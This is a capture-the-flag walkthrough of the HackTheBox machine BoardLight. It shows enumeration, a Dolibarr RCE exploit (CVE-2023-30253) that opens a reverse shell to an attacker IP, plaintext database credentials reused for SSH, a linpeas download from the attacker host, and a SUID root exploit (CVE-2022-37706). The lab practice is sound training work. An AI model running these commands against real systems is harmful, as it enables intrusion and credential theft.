HackTheBox BoardLight

Machine Synopsis

Key exploitation techniques:

• Dolibarr ERP/CRM Remote Code Execution (CVE-2023-30253)
• Web configuration file information disclosure (plaintext credentials)
• SSH for initial user access
• SUID binary privilege escalation via Enlightenment (CVE-2022-37706)

Enumeration

$ nmap -sC -sV 10.10.11.11

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web page footer © 2020 All Rights Reserved By Board.htb suggested a hostname. board.htb was added to /etc/hosts.

ffuf was used for virtual host enumeration, leading to numerous false positives. Filtering by size (-fs 15949) isolated crm as a valid subdomain.

# Add board.htb to /etc/hosts
❯ echo -e '10.10.11.11\tboard.htb' | sudo tee -a /etc/hosts

# Fuzz for virtual hosts, filtering out common false positives
$ ffuf -u "http://board.htb" -H "Host: FUZZ.board.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 15949
...
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 36ms]
...

There seems to be multiple false positives. Filter out size 15949.

$ ffuf -u "http://board.htb" -H "Host: FUZZ.board.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 15949
...
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 36ms]

crm.board.htb was added to /etc/hosts. This led to a Dolibarr ERP/CRM instance login page.

Default credentials admin:admin allowed access to a dashboard, but administrative actions were restricted by an “Access is denied” message.

Exploitation

Dolibarr RCE (www-data) via CVE-2023-30253

Researching “Dolibarr 17.0 exploit” (likely implied from context or initial banner info, though not explicit in provided text) led to a GitHub repository detailing CVE-2023-30253, an RCE vulnerability. The exploit script was used to gain a reverse shell as www-data.

# Execute the exploit script with attacker IP and port
$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.5 9999

# Set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.11] 50130
bash: cannot set terminal process group (890): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

From the www-data shell, local enumeration identified the /home/larissa directory, but direct access was denied.

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ cd /home
www-data@boardlight:/home$ ls
larissa
www-data@boardlight:/home$ cd larissa
bash: cd: larissa: Permission denied

Further enumeration focused on the Dolibarr installation itself. The conf directory was located, containing conf.php.

www-data@boardlight:/home$ find /var/www/html/crm.board.htb/ -name "conf"
/var/www/html/crm.board.htb/htdocs/conf
www-data@boardlight:/home$ ls /var/www/html/crm.board.htb/htdocs/conf
conf.php
conf.php.example
conf.php.old

Reading conf.php revealed plaintext database credentials, including dolibarrowner:serverfun2$2023!!.

www-data@boardlight:/home$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
...
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
...

The password serverfun2$2023!! was successfully used to establish an SSH connection as larissa.

Privilege Escalation

SUID enlightenment_sys Abuse (CVE-2022-37706)

To identify potential privilege escalation vectors, linpeas.sh was transferred to the target and executed.

# On attacking machine, serve linpeas.sh
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

# On target, download and execute linpeas.sh
larissa@boardlight:~$ wget http://10.10.14.5/linpeas.sh
larissa@boardlight:~$ chmod +x linpeas.sh
larissa@boardlight:~$ ./linpeas.sh
...
SUID - Check easy privesc, exploits and write perms
...
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
...

linpeas.sh flagged /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys as an interesting SUID binary. Research indicated this binary is vulnerable to CVE-2022-37706. A public exploit script was obtained and executed on the target.

larissa@boardlight:~/Downloads$ ./exploit.sh 
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
#